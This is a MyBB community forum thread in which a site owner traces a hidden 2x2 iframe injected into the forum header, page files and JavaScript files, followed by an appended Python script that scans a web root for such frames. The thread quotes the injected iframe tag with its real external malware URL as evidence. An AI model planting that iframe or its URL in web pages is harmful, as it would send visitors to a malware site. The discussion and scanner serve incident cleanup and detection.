MyBB Community Forums

Full Version: Access the {$stylesheets} template
My website was hit with some code injection. The myBB forum was injected with code in a rather unusual place.

By viewing the website source code, check out the header (I shortened it to make it easier to read)

<script type=...></script>

<iframe name="Twitter" src="http://bsmartens.com/ewzs.html?j=1275972" align="middle" frameborder="no" height="2" scrolling="auto" width="2"></iframe>

<link type="text/css" rel="stylesheet" href=".../global.css">

Somehow this guy stuck an iframe in the middle of my header, between linking the javascript and css files.
I looked through the templates and it looks like the injection is in {$stylesheets}, but I can't seem to find that template anywhere. Any ideas?

Thanks.
$stylesheets is not in a template - it's simply a variable. Have you checked the headerinclude template?
I thought so, and yes I checked it:

<script type="text/javascript" src="{$mybb->settings['bburl']}/jscripts/popup_menu.js?ver=1400"></script>
{$stylesheets}
<script type="text/javascript">

The injected iFrame is located between the popup_menu.js, and the first css file. So it's somewhere in the {$stylesheets}, though I can't seem to locate it anywhere...
That's strange. {$stylesheets} is defined in the core. Have you run the file verification tool via the ACP?
Ah, I wasn't aware of the file verification tool. It just generated a report for me, I'll go through all the changed files and see if I can find anything.

Also, thanks for your help thus far, I appreciate it.

Edit:
The iframe seems to have been placed in 10-15 various files, right before the "</body>" tag. Would this be from some sort of myBB security vulnerability?
There aren't any known security vulnerabilities in the core that we're aware of that haven't been patched. Are you running any plugins?
I'm running a few basic plugins, mostly just passive ones that give some unique CSS functionality to the forums. (Make locked thread titles appear greyed out, banned members' posts appear greyed out), disallow complex usernames.

The only two big ones I'm using are myShoutBox and Advanced WYSIWYG Editor. Also, I'm on version 1.6.8. I didn't upgrade to 1.6.9 in fear of losing all the visual changes I made to the templates.

Once again I'm greatly thankful for your help.

Edit:
Edited this part out by accident, website was http://sky9games.com/community/, though the problem was fixed by now.
I'd definitely advise upgrading to 1.6.9 ASAP.

When visiting your site, Chrome warns me of Malware being detected which I guess is from that iFrame.
Yep, looks like every single .js file had the iframe inserted into it. One last question, will upgrading to 1.6.9 change only the core files, and keep all my templates intact?

I made a number of small changes to some core files, though I guess I can always go back and replace them.
Yes, all templates and stylesheets should be fine, though we do recommend backing up your database beforehand whenever updating.
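For finding every copy of an injected frame like the one in this thread (a 2x2 iframe appended to page files and .js files), here is an added example that is not part of the original thread and is not MyBB code: a Python sweep of the web root that flags tiny iframes loading from a host other than your own. The host names, the extension list and the 5-pixel threshold are assumptions, and the sample strings are constructed.

```python
import os
import re
from urllib.parse import urlparse

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# name=value pairs; tolerates \" escaping as found inside JavaScript strings
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*\\?["']?([^"'\s>\\]+)""")
SCAN_EXT = (".php", ".js", ".html", ".htm", ".css")  # assumed set of web files
MAX_PX = 5  # assumption: a frame this small is not meant to be seen

# Constructed samples: an injected header, a legitimate embed, a patched .js file
SAMPLE_HEADER = ('<script src="jscripts/popup_menu.js"></script>\n'
                 '<iframe name="Twitter" src="http://injected.example/x.html?j=1" '
                 'frameborder="no" height="2" width="2"></iframe>\n'
                 '<link type="text/css" rel="stylesheet" href="global.css">')
SAMPLE_EMBED = '<iframe src="https://video.example/e/1" width="560" height="315"></iframe>'
SAMPLE_JS = r'document.write("<iframe src=\"http://injected.example/x.html\" width=\"2\" height=\"2\"></iframe>");'


def _tiny(value):
    m = re.fullmatch(r"(\d+)(?:px)?", value, re.IGNORECASE)
    return bool(m) and int(m.group(1)) <= MAX_PX


def suspicious_iframes(text, own_hosts):
    """Return (src, width, height) for tiny iframes loaded from a foreign host."""
    hits = []
    for tag in IFRAME_RE.findall(text):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(tag)}
        src = attrs.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        width, height = attrs.get("width", ""), attrs.get("height", "")
        if host and host not in own_hosts and (_tiny(width) or _tiny(height)):
            hits.append((src, width, height))
    return hits


def scan_tree(root, own_hosts):
    """Map each web file under root to its suspicious iframes; clean files are omitted."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(SCAN_EXT):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = suspicious_iframes(fh.read(), own_hosts)
                if hits:
                    report[path] = hits
    return report
```

Call `scan_tree("/path/to/forum", {"your-forum-host"})` and compare the resulting file list with the ACP file verification report.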